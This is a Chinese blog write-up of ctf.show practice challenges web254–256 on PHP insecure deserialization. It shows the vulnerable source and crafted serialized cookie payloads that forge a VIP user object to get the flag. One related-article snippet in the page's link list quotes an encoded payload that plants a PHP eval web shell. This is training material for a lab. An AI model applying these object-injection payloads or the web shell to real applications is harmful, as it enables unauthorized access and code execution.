[ctf.show]web入门 反序列化

最新推荐文章于 2024-07-17 23:31:19 发布
最新推荐文章于 2024-07-17 23:31:19 发布
阅读量500 收藏 1
点赞数
分类专栏: 刷题记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51078229/article/details/113870076
版权

web 254

和反序列化没啥关系,就是代码审计
payload:?username=xxxxxx&password=xxxxxx

web 255

账号密码的赋值和上面一样,就是多了一个cookie['user'],用burp抓包解决

highlight_file(__FILE__);
include('flag.php');

class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;

    public function checkVip(){
        return $this->isVip;
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    public function vipOneKeyGetFlag(){
        if($this->isVip){
            global $flag;
            echo "your flag is ".$flag;
        }else{
            echo "no vip, no flag";
        }
    }
}

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
    $user = unserialize($_COOKIE['user']);    
    if($user->login($username,$password)){
        if($user->checkVip()){
            $user->vipOneKeyGetFlag();
        }
    }else{
        echo "no vip,no flag";
    }
}

与上一题一样,需要满足$isVip=true,不同的是看上去好像没有能让他为true的地方,这里就可以实例化一个对象,里面的isVIP是true,然后再序列化一下

<?php
    class ctfShowUser{
        public $isVip=true;
    }
    $a=new ctfShowUser();
    echo serialize($a);

因为分号在cookie里会算作截断,所以用url编码一下,分号的编码是%3b
O:11:"ctfShowUser":1:{s:5:"isVip"%3bb:1%3b}

web 256

与上题一样需要实例化,不过需要加上账号密码的赋值,因为要满足账号密码不一样

<?php
    class ctfShowUser{
        public $username='a';
        public $password='b';
        public $isVip=true;
    }
    $a=new ctfShowUser();
    echo serialize($a);

所以get提交/?username=a&password=b
cookie的值写这个

O:11:"ctfShowUser":3:{s:8:"username"%3bs:1:"a"%3bs:8:"password"%3bs:1:"b"%3bs:5:"isVip"%3bb:1;}

web 257

huamanggg
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
[ctfshow]web入门——反序列化web261+web264-web267)
ShenZ的博客
03-02 6098
[ctfshow]web入门——反序列化 反序列化 unserialization [ctfshow]web入门——反序列化 web261 web264 str_replace字符串覆盖逃逸 web265 web266 web267 yii系列 反序列化 unserialization[ctfshow]web入门——反序列化
bfengj#CTF#thinkphp5.0.24反序列化rce1
07-25
thinkphp5.0.24反序列化rceModel是抽象类protected $append = [];// $value值,作为call函数引用的第二变量p
ctfshow web入门-反序列化
akxnxbshai的博客
05-19 1235
反序列化中常用的魔术方法: __wakeup() //执行unserialize()时,先会调用这个函数 __sleep() //执行serialize()时,先会调用这个函数 __destruct() //对象被销毁时触发 __call() //在对象上下文中调用不可访问的方法时触发 __callStatic() //在静态上下文中调用不可访问的方法时触发 __get() //用于从不可访问的属性读取数据或者不存在这个键都会调用此方法 __set() //用于将数据写入不可访问的属性 _.
CTFshow-web入门-php_unserialize-web254-278
最新发布
m0_72655585的博客
07-17 1070
PHP 序列化及反序列化基础反序列化学习笔记[CTF]PHP反序列化总结。
CTFSHOW-WEB入门-反序列化(笔记)
A10ng_的博客
04-14 2737
web254 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified time: 2020-12-02 19:29:02 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); highlight_file(__
ctfshow—web入门反序列化
2301_80337881的博客
03-24 930
别看上面乌拉乌拉一大堆,实际上就是要检测你传入的username和password和类中定义的username和password一不一样。所以直接get传参就可以了。
ctfshow web入门——反序列化
m0_74093152的博客
06-25 1665
代码审计,上传username=xxxxxx&password=xxxxxx即可获得flag。
php代码-ctf payload 第九题 反序列化 do you know robot
07-15
在CTF(Capture The Flag)竞赛中,编程者经常面临各种挑战,其中“反序列化”是一种常见的安全漏洞利用方式。第九题的标题暗示我们需要理解并利用PHP的反序列化机制来解决这个问题。PHP是一种广泛使用的服务器端...
国科大web安全中期CTF.pdf
11-22
国科大web安全中期CTF 在这篇文章中,我们将探讨国科大web安全中期CTF的相关知识点。 一、Web安全基础知识 在开始之前,让我们先了解一些基本概念。Web安全是指保护Web应用程序免受恶意攻击和未经授权的访问的...
CTF show萌新题系列
12-22
题目地址:https://ctf.show 0X01 萌新_密码1 1.16进制转字符串 有很多网站可以实现,这里我也附上我的脚本: # author: 羽 def hex_to_str(): while True: s = input("输入要转成字符串的16进制(输入空字符串退出...
ctfshow-web入门-反序列化
2301_80470992的博客
03-23 1456
先看题这道题目没什么特殊,甚至用不到反序列化,直接GET传参username和password的值与源码中一样即可完成。
ctfshow web入门反序列化
qq_53063436的博客
11-06 1070
魔术变量: __sleep() //在对象被序列化之前运行 __wakeup() //将在反序列化之后立即调用(当反序列化时变量个数与实际不符是会绕过) __construct() //在类实例化时,会触发进行初始化 __destruct() //对象被销毁时触发 __toString(): //当一个对象被当作字符串使用时触发 __call() //在对象上下文中调用不可访问的方法时触发 __callStatic() //在静态上下文中调用不可访问的方法时触发 __get() //获得一个类的成员变量时调
ctfshow web入门 反序列化
Sentiment的博客
12-26 1865
web254
ctf_show笔记篇(web入门---反序列化
whale_waves的博客
03-19 1573
例如$a = 1 $b = 2, 这时让$b = &$a, 再给$a 重新赋个值 $a = 3, 这个时候$b就会一直跟着$a变化, $a是什么$b就是什么。利用php处理畸形的序列化的处理措施, 当php收到畸形的序列化时, 会因为对此序列化的不放心, 会第一时间处理掉它, 所以能直接让处理他的顺序排在了最前面。这时, 如果传入一个|O:5:"Class"类似于这样的序列化, php就会自动把|前面的当作键名用, 反而会反序列化|后的值。
ctfshow—web入门—php反序列化
m0_74013288的博客
11-12 665
虽然序列化时会调用sleep()函数,给username和password赋值为空,但是反序列化时会进入__unserialize中,在最后进行反序列化的时候又会重现赋值,所以可以不用管这个函数,,,invoke函数也没有调用,所以不用管。分析代码,发现需要使ctfShowUser这个类里面的username和password不一样,因为是序列化,对象的属性(变量)和构造方法内的变量赋值我们是可控的,所以我们将username和password改成不一样的就行。查看页面源代码,可以找到我们反序列化的入口;
CTFshow-WEB入门-反序列化
feng的博客
02-14 5537
前言 简单的反序列化直接给出payload,有意思的,较为复杂的和我不太会的会分析一波。 web254 ?username=xxxxxx&password=xxxxxx web255 <?php class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=true; } echo urlencode(serialize(new ctfShowUser())
ctfshow的web入门->反序列化
2301_80481202的博客
03-23 1203
运行得到:O%3A10%3A%22ctfshowvip%22%3A2%3A%7Bs%3A8%3A%22username%22%3Bs%3A7%3A%22877.php%22%3Bs%3A8%3A%22password%22%3Bs%3A25%3A%22%3C%3Fphp+%40eval%28%24_POST%5B1%5D%29%3B%3F%3E%22%3B%7D。file_get_contents('php://input')代码中的这一句可以访问请求的原始数据流,可以获取到GET和POST的数据。
【CTFSHOW】web入门反序列化
7ruth0hn的博客
07-25 2853
web254 include('flag.php'); class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=false; public function checkVip(){ return $this->isVip; } public function login($u,$p){ if($this
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

huamanggg

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值